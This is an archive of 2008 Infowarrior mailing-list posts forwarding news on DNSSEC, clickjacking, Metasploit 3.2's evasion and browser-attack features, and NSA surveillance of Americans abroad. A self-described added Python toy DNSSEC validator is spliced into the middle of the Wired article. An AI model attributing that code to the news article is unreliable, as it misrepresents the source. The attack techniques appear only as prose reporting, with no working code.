http://www.adacore.com/home/gnatpro/tokeneer/

Project Summary

In order to demonstrate that developing highly secure systems to the level of rigor required by the higher assurance levels of the Common Criteria is possible, the NSA (National Security Agency) asked Praxis High Integrity Systems to undertake a research project to develop part of an existing secure system (the Tokeneer System) in accordance with Praxis' Correctness by Construction development process. This development and research work has now been made available by the NSA to the software development and security communities in an effort to prove that it is possible to develop secure systems rigorously in a cost effective manner.

The Tokeneer ID Station development project has demonstrated that the Praxis Correctness by Construction development process is capable of producing a high quality, low defect system in a cost effective manner following a process that conforms to the Common Criteria EAL5 requirements.

The Tokeneer ID Station system's key statistics are:

* lines of code: 9939
* total effort (days): 260
* productivity (lines of code per day, overall): 38
* productivity (lines of code per day, coding phase): 203
* defects discovered since delivery: 1

With the aim of achieving EAL5 levels of assurance, we believe that the Correctness by Construction process can achieve EAL7. The proof activity we use in our Correctness by Construction process is sufficient for EAL7, which involves tool supported code proof but manual proof of the Specification and Design. The process can be tightened appropriately to meet the additional quality control requirements of EAL7 by using tools that provide fully integrated electronic support.
< - >

http://www.adacore.com/home/gnatpro/tokeneer/

From rforno at infowarrior.org Wed Oct 8 12:07:56 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 8 Oct 2008 08:07:56 -0400
Subject: [Infowarrior] - SUV sketch gets artist detained @ border
Message-ID:

Published October 04, 2008 10:00 pm - Woman was detained by Customs and Border Protection because of an SUV sketch she made for artwork.

http://www.pressrepublican.com/homepage/local_story_278220015.html

By LOHR McKINSTRY
Staff Writer

KEENE VALLEY -- Keene Valley resident Jerilea Zempel was detained at the U.S. border this summer because she had a drawing of a sport-utility vehicle in her sketchbook.

U.S. Customs and Border Protection officers told Zempel they suspected her of copyright infringement.

She was released after more than an hour in custody at the Houlton, Maine, port of entry from New Brunswick, Canada.

Her release came only after she persuaded border guards she was an artist doing a project that involved a crocheted SUV as a statement against America's dependence on oil and love for big vehicles.

SHROUDED CAR

Zempel's adventure began when she was returning from the Cultural Capital Festival in Sackville, New Brunswick, where her submission was an SUV cozy on a rented Hyundai Santa Fe.

"I wanted to turn an oversize, macho, gas-guzzling vehicle into a technological ghost by shrouding it in a white, fuzzy cover reminiscent of women's handiwork from another time, another place."

After the festival, Zempel headed for home in her own Toyota Prius hybrid and stopped at the border crossing on Interstate 95 in Maine.

"What happened when I re-entered the U.S. made me ponder what my lowly art project could mean in a larger political sphere.

"And it gave me an idea for a title: the Homeland Security Blanket."

SEARCH AT BORDER

Zempel's passport showed she'd been to Africa, Australia, Central and South America, Mexico, Turkey and Europe in the last nine years.

"U.S. citizens who've traveled to the places I've been need to be looked at. A half hour at the computer gave the agent cause to put me into another suspicious category, meriting a full car search. She (the agent) took my keys and went through my car.

"After going through my (laptop) computer, digital camera, cell phone, business cards, suitcase, reading materials, boxes of yarn and crochet tools, she returned with my sketchbook.

"I was taken to a room and told to sit on a bench with handcuffs at both ends. But they did not handcuff me."

Zempel had drawn an SUV covered by a cozy, with its mirrors marked as "ears."

"My sketchbook puzzled her," Zempel said. "It was a cartoon sketch. They couldn't understand what I was doing. She said, 'Just what were you doing in Canada? We think you're engaged in some kind of copyright infringement.'"

She said she and the CBP agent then had a "lively discussion" over Zempel's status as an artist and a professor at Fordham University in New York City.

"I had to spell Fordham for her. She left the room to see if she could find me on the college's Web site."

While she was out, Zempel found her college ID and showed it to the agent when she came back.

"Somehow being a college professor made it all OK. She said, 'Welcome back to the U.S.' I was allowed to leave."

CIVIL RIGHTS

Zempel said that before the incident she didn't know border guards could search computers and other digital devices "without reasonable cause ... I was surprised to learn all your civil rights are suspended. It was a form of intimidation."

U.S. Rep. Zoe Lofgren (D-Calif.) recently introduced a bill that would prevent Customs and Border Protection officials from conducting border searches and seizures of laptops and other electronic devices when U.S. citizens return from international travel unless the agents have justifiable reason to do so.
Customs and Border Protection spokesman Theodore Woo said he could not discuss the specifics of the interview process Zempel went through.

"CBP officers may, at times, inspect a person's belongings to determine whether or not items are admissible or are illegal."

Woo didn't say how a sketch of a car could trigger a border guard's suspicion of copyright infringement. But he did say agents are trained in trademark and copyright laws.

"It's a part of a CBP officer's training. Time is set aside for intellectual-property-rights training."

The agency's role is to keep the country's borders safe while at the same time enforcing many rules and regulations, he said.

From rforno at infowarrior.org Wed Oct 8 12:10:12 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 8 Oct 2008 08:10:12 -0400
Subject: [Infowarrior] - It's DMCA exemption time!
Message-ID:

It's DMCA exemption time! - October 6, 2008

http://www.contentagenda.com/blog/1500000150/post/640034464.html

Get those anti-circumvention exemptions ready kids! It's time for the Copyright Office's triennial review of Section 1201(a)(1) of the Digital Millennium Copyright Act, in which the Register of Copyrights makes recommendations to the Librarian of Congress about granting temporary exemptions to the ban on circumventing encryption on certain classes of works. The federal register notice is here.

Congress added the triennial review to the DMCA as a fail-safe mechanism, in case it turned out that the blanket ban on circumvention was "unduly burdening" fair use of certain types of work. The exemptions are only good for three years, however, and must be reapplied for with each review.

The last rulemaking, in 2006, resulted in six exemptions:

1. Audiovisual works included in the educational library of a college or university's film or media studies department, when circumvention is accomplished for the purpose of making compilations of portions of those works for educational use in the classroom by media studies or film professors.

2. Computer programs and video games distributed in formats that have become obsolete and that require the original media or hardware as a condition of access, when circumvention is accomplished for the purpose of preservation or archival reproduction of published digital works by a library or archive. A format shall be considered obsolete if the machine or system necessary to render perceptible a work stored in that format is no longer manufactured or is no longer reasonably available in the commercial marketplace.

3. Computer programs protected by dongles that prevent access due to malfunction or damage and which are obsolete. A dongle shall be considered obsolete if it is no longer manufactured or if a replacement or repair is no longer reasonably available in the commercial marketplace.

4. Literary works distributed in ebook format when all existing ebook editions of the work (including digital text editions made available by authorized entities) contain access controls that prevent the enabling either of the book's read-aloud function or of screen readers that render the text into a specialized format.

5. Computer programs in the form of firmware that enable wireless telephone handsets to connect to a wireless telephone communication network, when circumvention is accomplished for the sole purpose of lawfully connecting to a wireless telephone communication network.

6. Sound recordings, and audiovisual works associated with those sound recordings, distributed in compact disc format and protected by technological protection measures that control access to lawfully purchased works and create or exploit security flaws or vulnerabilities that compromise the security of personal computers, when circumvention is accomplished solely for the purpose of good faith testing, investigating, or correcting such security flaws or vulnerabilities.

Written comments recommending exemptions are due in the Copyright Office December 2, 2008. A notice of proposed rulemaking will be issued later in December based on those recommendations, and final comments are due February 2, 2009.

From rforno at infowarrior.org Thu Oct 9 01:19:00 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 8 Oct 2008 21:19:00 -0400
Subject: [Infowarrior] - Recovering Censored Text Using Photoshop and JavaScript
Message-ID: <4E5970AF-D0C6-42D1-A8C4-4DAEA2BA4262@infowarrior.org>

Recovering Censored Text Using Photoshop and JavaScript

My friend Andrew recently posted a teaser for a new project he's working on, but with part of the headline pixelated to obscure what the project actually is. My curiosity got the best of me and I decided to do what any self-respecting geek would do: write a program to figure out what the censored text said.

Ultimately I failed to recover most of the censored text (except "to"), so I had to cheat a little. The following video is the program running on a very similar image I created. This proves it works in ideal conditions, but needs some improvement to work in less than ideal cases.
< - >

http://tlrobinson.net/blog/?p=52

From rforno at infowarrior.org Thu Oct 9 01:25:33 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 8 Oct 2008 21:25:33 -0400
Subject: [Infowarrior] - Feds Start Moving on Net Security Hole
Message-ID: <2381780D-F9E1-4FF3-BF92-BB3C05857142@infowarrior.org>

Feds Start Moving on Net Security Hole
By Ryan Singel
October 08, 2008 | 8:05:21 PM
Categories: Cybersecurity, Hacks and Cracks

http://blog.wired.com/27bstroke6/2008/10/feds-take-step.html

Starting Thursday morning, the U.S. government is seeking comment on who should create and vouch for the internet's most crucial document -- the root zone file -- that serves as the cornerstone of the system that lets users get to websites and emails find their way to inboxes.

The non-profit ICANN, the for-profit Verisign and the Commerce Department's National Telecommunications and Information Administration all have different answers to what is a long-standing, and geopolitically charged internet governance question. But the only thing that matters for the security of the internet is the speed that they answer the question, according to domain-name system expert Paul Vixie.

"We've got to get the root signed, it does not matter by whom," Vixie said by e-mail. "It's necessary simply that it be done, by someone, and that we stop anyone from arguing about whether letting someone hold the root key would make them king."

At issue is a massive net security hole that security researcher Dan Kaminsky discovered in early 2008 that was temporarily patched in July. If not given a complete fix soon, the vulnerability could allow so much net fraud that it would strip all trust from the internet users that any website they were visiting is the genuine article, experts say.

The only known complete fix is DNSSEC -- a set of security extensions for name servers. (That said, there are other effective defenses and OpenDNS, for one, protects users now.)
Those extensions cryptographically sign DNS records, ensuring their authenticity like a wax seal on a letter.

The push for DNSSEC has been ramping up over the last few years, with four regions -- including Sweden (.se) and Puerto Rico (.pr) -- already securing their own domains with DNSSEC. Four of the largest top-level domains -- .org, .gov, .uk and .mil, are not far behind, while the entire U.S. government will comply for its websites starting in January 2009.

But because DNS servers work in a giant hierarchy, deploying DNSSEC successfully also requires having someone trustworthy sign the so-called "root file" with a public-private key. Otherwise, an attacker can undermine the entire system at the root level, like a criminal having taken over control of the Supreme Court justices.

With a properly signed root file, your browser can repeatedly ask, "How do I know this is the real answer?", until the question reaches the root file, which says, "Because I vouch for it."

Bill Woodcock, one of the net's foremost experts on network security, blasted the NTIA earlier this summer for moving too slowly on DNSSEC, while the government protested that it was moving at the right speed.

"If the root isn't signed, then no amount of work that responsible individuals and companies do to protect their domains will be effective," Woodcock said in July. "You have to follow the chain of signatures down from the root to the top-level domain to the user's domain. If all three pieces aren't there, the user isn't protected."

On Tuesday, NTIA's Acting Assistant Secretary Meredith Baker told international net leaders that it was opening comment on DNSSEC and root zone signing this week.

"In light of existing and emerging threats, the time is ripe to consider long-term solutions, such as DNSSEC," Baker said.
"As we consider deployment of DNSSEC, particularly at the root zone level, it is critical that all the interested stakeholders have the opportunity to express their views on the matter, as deployment of DNSSEC would represent one of the most significant changes to the DNS infrastructure since its inception."

That's where the politics comes in. The DNS root is controlled by the NTIA, which divides the responsibility for the creation, editing and distribution of the root file between itself, ICANN and the for-profit Verisign, which runs the .com domain.

Currently companies that manage top-level domains like .com submit changes to ICANN, which then sends them to NTIA for approval, before they're forwarded to VeriSign. VeriSign actually edits the root file and publishes it to the 13 root servers around the world.

Now in a previously unpublished draft (.pdf) of the final proposal given to the government (.pdf), ICANN says it's best qualified for the root signing job and proposes to take over the job of approving the changes, editing the root file, and signing it, then handing it off to VeriSign for trusted distribution.

But changing that system could be perceived as reducing U.S. control over the net -- a touchy geopolitical issue. ICANN is often considered by Washington politicians to be akin to the United Nations.

VeriSign, often criticized for trying to exercise too much control over the net, counter-proposes that its role be enlarged. Under its proposal (.pdf), the root zone file will be signed using keys it distributes to the root server operators and if enough of them sign the file, then it is considered official.

The root-zone file, which contains entries for the 300 or so top-level domains such as .gov and .com, changes almost every day, but the number of changes to the file will likely increase radically in the near future, since ICANN decided in June to allow an explosion of new top-level domain names.
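Woodcock's remark above that all three links (root, top-level domain, user's domain) must be present is the whole argument for signing the root. As an added example (not code from the article or from any DNS software), here is a toy chain-of-trust validator: each zone publishes a key, the parent pins the child's key with a digest (the DS record), and a validator walks down from a trust anchor. Real DNSSEC uses RSA/ECDSA and DNSKEY/DS/RRSIG records; this stands in hash-based Lamport one-time keys so it runs on the standard library, and the zone names and address are constructed sample values.

```python
"""Toy DNSSEC chain of trust: root -> TLD -> domain, validated from an anchor.

Added example, not from the article or any DNS software. Real DNSSEC uses
RSA/ECDSA keys and DNSKEY, DS and RRSIG records; here each zone holds one
hash-based Lamport one-time key so the whole thing runs on the standard
library, a "DS" is the SHA-256 digest of a child's public key, and each zone
signs exactly one message: the DS of its child, or, at the leaf, the answer.
What it demonstrates is the point Woodcock makes above: the answer validates
only when the anchor, every DS and every signature down the chain are present
and agree; an unsigned root or a skipped level breaks it.
Zone names and the address are constructed sample values.
"""
import dataclasses
import hashlib
import secrets


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def lamport_keygen():
    """One-time key: 256 pairs of secrets; the public key is their hashes."""
    sk = [(secrets.token_bytes(32), secrets.token_bytes(32)) for _ in range(256)]
    pk = b"".join(sha256(a) + sha256(b) for a, b in sk)
    return sk, pk


def lamport_sign(sk, msg: bytes) -> bytes:
    """Reveal, for each bit of SHA-256(msg), the secret matching that bit."""
    d = sha256(msg)
    return b"".join(sk[i][(d[i // 8] >> (7 - i % 8)) & 1] for i in range(256))


def lamport_verify(pk: bytes, msg: bytes, sig: bytes) -> bool:
    """Hash each revealed secret and compare with the published half for that bit."""
    if len(pk) != 256 * 64 or len(sig) != 256 * 32:
        return False
    d = sha256(msg)
    for i in range(256):
        bit = (d[i // 8] >> (7 - i % 8)) & 1
        want = pk[i * 64 + bit * 32: i * 64 + bit * 32 + 32]
        if sha256(sig[i * 32:(i + 1) * 32]) != want:
            return False
    return True


@dataclasses.dataclass
class Zone:
    name: str
    pubkey: bytes     # the zone's published key (its DNSKEY)
    payload: bytes    # what this zone vouches for: child's DS, or the final answer
    signature: bytes  # this zone's signature over payload


def ds(pubkey: bytes) -> bytes:
    """DS record: the digest a parent publishes to pin its child's key."""
    return sha256(pubkey)


def build_chain(answer: bytes):
    """Sign from the leaf upward; return the trust anchor and the zones top-down."""
    root_sk, root_pk = lamport_keygen()
    tld_sk, tld_pk = lamport_keygen()
    dom_sk, dom_pk = lamport_keygen()
    domain = Zone("example.org.", dom_pk, answer, lamport_sign(dom_sk, answer))
    tld = Zone("org.", tld_pk, ds(dom_pk), lamport_sign(tld_sk, ds(dom_pk)))
    root = Zone(".", root_pk, ds(tld_pk), lamport_sign(root_sk, ds(tld_pk)))
    return ds(root_pk), [root, tld, domain]


def validate(trust_anchor: bytes, chain, answer: bytes) -> bool:
    """Walk down from the anchor: each key must be pinned by the level above,
    each signature must verify, and the leaf must have signed the answer we got."""
    pinned = trust_anchor
    for zone in chain:
        if ds(zone.pubkey) != pinned:
            return False                      # key not vouched for from above
        if not lamport_verify(zone.pubkey, zone.payload, zone.signature):
            return False                      # signature missing or forged
        pinned = zone.payload                 # becomes the DS for the next level
    return bool(chain) and chain[-1].payload == answer


def scenarios(answer: bytes = b"example.org. A 203.0.113.10") -> dict:
    """Exercise the validator: a full chain and three ways the chain can break."""
    anchor, (root, tld, domain) = build_chain(answer)
    unsigned_root = dataclasses.replace(root, signature=b"\x00" * (256 * 32))
    return {
        "full chain": validate(anchor, [root, tld, domain], answer),
        "root not signed": validate(anchor, [unsigned_root, tld, domain], answer),
        "TLD link missing": validate(anchor, [root, domain], answer),
        "answer tampered": validate(anchor, [root, tld, domain], b"example.org. A 198.51.100.7"),
    }


if __name__ == "__main__":
    for case, ok in scenarios().items():
        print(f"{case:18} -> {'validated' if ok else 'REJECTED'}")
```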
Verisign and the NTIA declined to comment ahead of the proceedings, while ICANN did not return a call for comment.

Public comments will be taken on the Notice of Inquiry that will be published Thursday morning on the NTIA's website.

From rforno at infowarrior.org Thu Oct 9 12:19:40 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 9 Oct 2008 08:19:40 -0400
Subject: [Infowarrior] - Adobe warns Clickjackers could take over your web cam
Message-ID: <7130F77A-999E-4D04-B92F-A2FB61C3238B@infowarrior.org>

Adobe warns Clickjackers could take over your web cam
Put some clothes on, at least

http://www.theinquirer.net/gb/inquirer/news/2008/10/09/clickjacking

By Emma Hughes: Thursday, 09 October 2008, 11:12 AM

YOU'VE HEARD of "hijacking" and more certainly the word "click", but you may not have heard of the most ridiculous word blend of the day, "clickjacking". But you should be very afraid.

The big red alarm has been sounded, as clickjacking - a malicious attack on web servers - is spreading, and spreading fast, insecurity fear-mongers are warning.

The clickjacking technique is yet another simple but ingenious way of revealing all to a prying hacker. This attack works by directing a user to a pre-determined webpage chosen by the hacker, when the user clicks on a seemingly innocent link - the hacker is able to gain control of all number of things this way including the webcam and the microphone.

Clickjacking, (we'll keep repeating it so it sounds real) has been identified as a vulnerability on many browsers, namely Adobe Flash Player, Firefox, Internet Explorer, Opera, Safari and Google Chrome.

Giorgio Maone, author of the Firefox extension NoScript, told Newsfactor, "Clickjacking is a very simple attack to build, and now that the details are out, any script kid can try it successfully."

Maone further laments that unfortunately there is no way of tracking just how many of these attacks are out there, as there are infinite ways to implement such an attack.
Clickjacking was supposed to have been revealed last month at the Open Web Application Security Project NYC AppSec conference by Robert Hansen of SecTheory and Jeremiah Grossman of WhiteHat Security who discovered but concealed this threat giving Adobe and other browsers a chance to come up with a fix. However, a fix they did not find.

Adobe has instead released security information for its Flash Player which blocks access to the webcam and camera, but due to the many variants of this attack it is seemingly impossible to deter altogether.

If someone does manage to come up with a general browser fix, it won't be any time soon predicts Maone.

From rforno at infowarrior.org Thu Oct 9 12:20:42 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 9 Oct 2008 08:20:42 -0400
Subject: [Infowarrior] - Metasploit 3.2 Offers More 'Evil Deeds'
Message-ID:

www.internetnews.com/security/article.php/3776831

Metasploit 3.2 Offers More 'Evil Deeds'
By Sean Michael Kerner
October 8, 2008

TORONTO -- Hacking into systems (albeit for testing purposes) is apparently getting easier with the upcoming open source Metasploit 3.2 framework, according to its creator.

During a packed presentation at the SecTor conference here yesterday, Metasploit creator H. D. Moore detailed some of the new features in the upcoming Metasploit 3.2 release. They include names such as Browser AutoPwn, Metasploit in the Middle and the Evil Wireless Access Point.

"For http we do a whole bunch of evil things to a browser," Moore said, addressing an audience of security and networking professionals from sectors such as government and leading corporations. Many attend the conference in order to stay up to date on vulnerability assessments and how hackers exploit networks.

Metasploit is an open source attack framework first developed by Moore in 2003.
With the Metasploit 3.0 release, the project has moved to an all Ruby programming base, which Moore credits with quickening development and exploits.

Take the context map payload feature, which encodes attack shellcode. Moore claimed that the new feature will make it even more difficult to detect attack code.

Getting attack code onto a target machine will also be easier on Metasploit 3.2 with improvements to the Raw Packet Tools function. A new library called PacketFu is expected by Moore to achieve packet injection for both wired and wireless end points. It also provides improved support for exploiting multi-core CPU machines, which had been more difficult to attack with previous versions of Metasploit.

Metasploit is also able to take exploit code and weaponize it in an .EXE (executable file) that can be deployed by an attacker. Moore said the EXE template that created EXE attacks has been improved in Metasploit 3.2 in order to defeat AntiVirus vendor signature detection. Moore boasted that he is using the same resources that the anti-virus vendors are using to identify virus signatures to ensure that the Metasploit EXE template is not identified.

If that wasn't enough, Metasploit 3.2 will include a new super weapon that will make exploiting browsers a trivial matter. The new Browser Autopwn feature is a client side auto attack system that will fire up exploits automatically against a user's browser with the goal of providing a shell into the browser.

Man in the middle attacks are also addressed in the package features. Moore explained that Metasploit in the Middle Feature puts the attack framework in between the users and their intended location. The man in the middle approach could be used to spoof DNS or to create a fake access point.

"It will abuse the HTTP security model, stealing cookies and saved form data," Moore said.
And if that's not enough to give security researchers a taste of the latest developments in security vulnerabilities, there is the Evil Wireless Access Point feature. Moore said it can create an access point that consumes all other access points around it. Adding insult to evil, it has the ability to spoof any access point that is already on a user's preferred access point list. Browsers beware.

Last but certainly not least in this testing culture, Moore announced that Metasploit 3.2 now has full IPv6 support.

"The US Government has a mandate for IPv6 support, so there is at least one target there for you," Moore said.

Let the testing begin.

From rforno at infowarrior.org Thu Oct 9 17:44:48 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 9 Oct 2008 13:44:48 -0400
Subject: [Infowarrior] - Inside Account of U.S. Eavesdropping on Americans
Message-ID:

ABC News Exclusive: Inside Account of U.S. Eavesdropping on Americans
U.S. Officers' "Phone Sex" Intercepted; Senate Demanding Answers
By BRIAN ROSS, VIC WALTER, and ANNA SCHECTER

http://abcnews.go.com/print?id=5987804

Oct. 9, 2008 -- Despite pledges by President George W. Bush and American intelligence officials to the contrary, hundreds of US citizens overseas have been eavesdropped on as they called friends and family back home, according to two former military intercept operators who worked at the giant National Security Agency (NSA) center in Fort Gordon, Georgia.

The chairman of the Senate Intelligence Committee, Jay Rockefeller (D-WV), called the allegations "extremely disturbing" and said the committee has begun its own examination.

"We have requested all relevant information from the Bush Administration," Rockefeller said Thursday. "The Committee will take whatever action is necessary."
"These were just really everyday, average, ordinary Americans who happened to be in the Middle East, in our area of intercept and happened to be making these phone calls on satellite phones," said Adrienne Kinne, a 31-year-old US Army Reserves Arab linguist assigned to a special military program at the NSA's Back Hall at Fort Gordon from November 2001 to 2003. Kinne described the contents of the calls as "personal, private things with Americans who are not in any way, shape or form associated with anything to do with terrorism." She said US military officers, American journalists and American aid workers were routinely intercepted and "collected on" as they called their offices or homes in the United States. Another intercept operator, former Navy Arab linguist David Murfee Faulk, 39, said he and his fellow intercept operators listened in on hundreds of Americans picked up using phones in Baghdad's Green Zone from late 2003 to November 2007. "Calling home to the United States, talking to their spouses, sometimes their girlfriends, sometimes one phone call following another," said Faulk. The accounts of the two former intercept operators, who have never met and did not know of the other's allegations, provide the first inside look at the day-to-day operations of the huge and controversial US terrorist surveillance program. "There is a constant check to make sure that our civil liberties of our citizens are treated with respect," said President Bush at a news conference this past February. But the accounts of the two whistleblowers, which could not be independently corroborated, raise serious questions about how much respect is accorded those Americans whose conversations are intercepted in the name of fighting terrorism.
US Soldier's 'Phone Sex' Intercepted, Shared

Faulk says he and others in his section of the NSA facility at Fort Gordon routinely shared salacious or tantalizing phone calls that had been intercepted, alerting office mates to certain time codes of "cuts" that were available on each operator's computer. "Hey, check this out," Faulk says he would be told, "there's good phone sex or there's some pillow talk, pull up this call, it's really funny, go check it out. It would be some colonel making pillow talk and we would say, 'Wow, this was crazy'," Faulk told ABC News. Faulk said he joined in to listen, and talk about it during breaks in Back Hall's "smoke pit," but ended up feeling badly about his actions. "I feel that it was something that the people should not have done. Including me," he said. In testimony before Congress, then-NSA director Gen. Michael Hayden, now director of the CIA, said private conversations of Americans are not intercepted. "It's not for the heck of it. We are narrowly focused and drilled on protecting the nation against al Qaeda and those organizations who are affiliated with it," Gen. Hayden testified. He was asked by Senator Orrin Hatch (R-UT), "Are you just doing this because you just want to pry into people's lives?" "No, sir," General Hayden replied. Asked for comment about the ABC News report and accounts of intimate and private phone calls of military officers being passed around, a US intelligence official said "all employees of the US government" should expect that their telephone conversations could be monitored as part of an effort to safeguard security and "information assurance." "They certainly didn't consent to having interceptions of their telephone sex conversations being passed around like some type of fraternity game," said Jonathan Turley, a constitutional law professor at George Washington University who has testified before Congress on the country's warrantless surveillance program.
"This story is to surveillance law what Abu Ghraib was to prison law," Turley said.

Listening to Aid Workers

NSA awarded Adrienne Kinne an NSA Joint Service Achievement Medal in 2003 at the same time she says she was listening to hundreds of private conversations between Americans, including many from the International Red Cross and Doctors Without Borders. "We knew they were working for these aid organizations," Kinne told ABC News. "They were identified in our systems as 'belongs to the International Red Cross' and all these other organizations. And yet, instead of blocking these phone numbers we continued to collect on them," she told ABC News. A spokesman for Doctors Without Borders, Michael Goldfarb, said: "The abuse of humanitarian action through intelligence gathering for military or political objectives, threatens the ability to assist populations and undermines the safety of humanitarian aid workers." Both Kinne and Faulk said their military commanders rebuffed questions about listening in to the private conversations of Americans talking to Americans. "It was just always, that, you know, your job is not to question. Your job is to collect and pass on the information," Kinne said. Sometimes, Kinne and Faulk said, the intercepts helped identify possible terror planning in Iraq and saved American lives. "IEDs were disarmed before they exploded, that people who were intending to harm US forces were captured ahead of time," Faulk said. NSA job evaluation forms show he regularly received high marks for job performance. Faulk left his job as a newspaper reporter in Pittsburgh to join the Navy after 9/11. Kinne says the success stories underscored for her the waste of time spent listening to innocent Americans, instead of looking for the terrorist needle in the haystack.
"By casting the net so wide and continuing to collect on Americans and aid organizations, it's almost like they're making the haystack bigger and it's harder to find that piece of information that might actually be useful to somebody," she said. "You're actually hurting our ability to effectively protect our national security."

The NSA: "The Shadow Factory"

Both former intercept operators came forward at first to speak with investigative journalist Jim Bamford for a book on the NSA, "The Shadow Factory," to be published next week. "It's extremely rare," said Bamford, who has written two previous books on the NSA, including the landmark "Puzzle Palace" which first revealed the existence of the super secret spy agency. "Both of them felt that what they were doing was illegal and improper, and immoral, and it shouldn't be done, and that's what forces whistleblowers." A spokesman for General Hayden, Mark Mansfield, said: "At NSA, the law was followed assiduously. The notion that General Hayden sanctioned or tolerated illegalities of any sort is ridiculous on its face." The director of the NSA, Lt. General Keith B. Alexander, declined to directly answer any of the allegations made by the whistleblowers. In a written statement, Gen. Alexander said: "We have been entrusted to protect and defend the nation with integrity, accountability, and respect for the law. As Americans, we take this obligation seriously. Our employees work tirelessly for the good of the nation, and serve this country proudly." Copyright ©
2008 ABC News Internet Ventures

From rforno at infowarrior.org Fri Oct 10 12:31:52 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 10 Oct 2008 08:31:52 -0400
Subject: [Infowarrior] - Comment: Bad investment practices
Message-ID: <3D3F7473-87BA-4E33-BDFF-0F9CE680AD88@infowarrior.org>

Some Friday Food For Thought, since the economy is (rightly) on everyone's mind these days: I got the annual report (ending June 2008) for a UBS global fund I've got a small investment in the other day. To their credit, they break down "what worked" and "what didn't work" in rather clear and simple English. In fact, the entire report is pretty darn readable, which was quite nice. However, under the "what didn't work", this really got my attention: < - > Subheading: "Within the US equity component an overweight to financials -- particularly banks -- and an underweight to energy hurt Fund performance." ....and then the first line of the descriptive paragraph to follow: "Though financial stocks did not perform as well as we expected, we continue to overweight them." (p26) < - > I'm sorry -- but doesn't that sound like bad investing style? As one of my favorite commodity traders is prone to say, "do more of what is working, and less of that which is not." If after a few months the trade isn't working, common sense says GET OUT and move to what is working! But it gets better, for the next sentence of the paragraph reads: "In general, we are finding very attractive valuations within financials." Huh??? We've got UBS (and I'm sure tons of other brokers or fund advisors) basing their fund investments on valuations in a market where the data used to create such valuations is not to be trusted (does anyone know what the value of anything is worth this year, or when more surprise writedowns will be announced?) This past year, valuation models have proven utterly worthless. I said so to friends back in May.
Then, when their analysis and decisions on where to invest don't work, rather than adjust fire to move into what IS working they stick to their guns and overweight themselves to that losing sector/position/trade anyway. Part of this is how the "system" of mutual funds works, I understand that. But still ..... hold and hope, anyone? As one of millions of invest---er, victims of such practices, I'm reminded of those old trading jokes about brokerages and managed funds -- "We earn wealth the old fashioned way....we steal it." Or, perhaps more appropriately, where the definition of 'asset allocation' or 'wealth management' really means that the brokerage is able to effectively "allocate (or manage) wealth from your account to ours." Bear that in mind when watching ads for brokerages or Wealth Management firms ... remember, they get paid regardless of whether you make or lose money! (Disclosure: Although I am not a huge fan of mutual funds, I do own several as part of my overall retirement portfolio - some have done well, some have not. C'est life.) If I didn't welcome this paper loss to offset trading gains elsewhere this year, I'd be pretty livid. As it is, though, I'm pretty torqued at the philosophy behind this (and I'm sure many other) mutual funds who "stick to their guns" at all costs.....makes a pretty darn good case to do your own homework and research on your own investments - whatever they may be, stocks, bonds, funds, etfs, etc -- for at least we "little people" might be (or are) more flexible in changing our investing style with the current environment. That's part of our ability as individual investors and something made much more convenient for us thanks to the Internet and discounted online trading -- namely, being nimble, adaptable, and flexible, which is something the "big guys" can't be so easily. Put another way, in terms of investing flexibility, if the "big guys" are the Titanic (ha!), we're the high-performance racer.
Embrace that power to quickly navigate around the iceberg, take a breath to clear your head, and come back to look for and pick up survivors that will reward you handsomely down the road! Thus endeth the lesson. :) Of course, in full disclosure, I'm partly to blame for this -- three years ago I broke my own rule and bought into a mutual fund run by my broker. I've done that twice before over my career, and been burned twice. Never again! Have a great weekend, all. -rick (c) 2008 Richard Forno. Permission granted to reproduce in entirety with credit given to author

From rforno at infowarrior.org Sat Oct 11 02:25:29 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 10 Oct 2008 22:25:29 -0400
Subject: [Infowarrior] - Inside NSA's Operation Highlander
Message-ID:

Inside Operation Highlander: the NSA's Wiretapping of Americans Abroad
By Kim Zetter
October 10, 2008 | 6:06:27 PM
http://blog.wired.com/27bstroke6/2008/10/kinne.html

A top secret NSA wiretapping facility in Georgia accused of spying on Americans illegally was hastily staffed with inexperienced reservists in the months following September 11, where they worked under conflicting orders and with little supervision, according to three former workers at the spy complex. "Nobody knew exactly what the heck we were doing," said a former translator for the project, code named Highlander, who spoke on condition of anonymity. "We were figuring out the rules as we were going along." Former Army Reserve linguist Adrienne Kinne, who worked at the facility at Fort Gordon, won new attention this week for her year-old claim that she intercepted and transcribed satellite phone calls of American civilians in the Middle East for the National Security Agency. Senate intelligence committee chair Jay Rockefeller (D-W.Va.) opened a probe into the alleged abuses after ABC News reported on them Thursday.
Threat Level spoke with Kinne extensively last year about the alleged systematic surveillance of Americans and others operating in the Middle East following the 9/11 attacks. She provided a number of details about some of the calls and how the operation was conducted. Aid workers and journalists were specifically targeted in the program, and their phone numbers were added to a "priority list", Kinne said last year. Among those under surveillance were workers from nongovernmental organizations such as Doctors Without Borders, the International Committee of the Red Cross, and the United Nations Developing Countries Program, as well as journalists staying in Baghdad at the time of the Iraq invasion. The intercepted calls included conversations among American, British, Australian and other civilian foreign nationals in the Middle East, as well as conversations between aid workers and journalists in the Middle East and their family members in the United States. "If it was happening then I'm sure it's happening now, and who knows on what scale," Kinne said. "That's the thing that really bothers me." But at the time we were unable to confirm her account of the spying. Two coworkers of Kinne's, who spoke with Threat Level on condition of anonymity, conceded that the group operated under ambiguous rules and with poor supervision, but insisted no deliberate eavesdropping on Americans occurred. Now a second former Arabic linguist with the Navy has corroborated her claims to ABC, and to NSA expert James Bamford, who includes the story in his upcoming book Shadow Factory. If the allegations are true, it would seem to indicate that warrantless spying on Americans approved by President Bush following 9/11 expanded rapidly beyond U.S. borders to citizens overseas, notwithstanding United States Signals Intelligence Directive 18, or USSID 18 -- an NSA rule that bars overseas surveillance of Americans without authorization and probable cause.
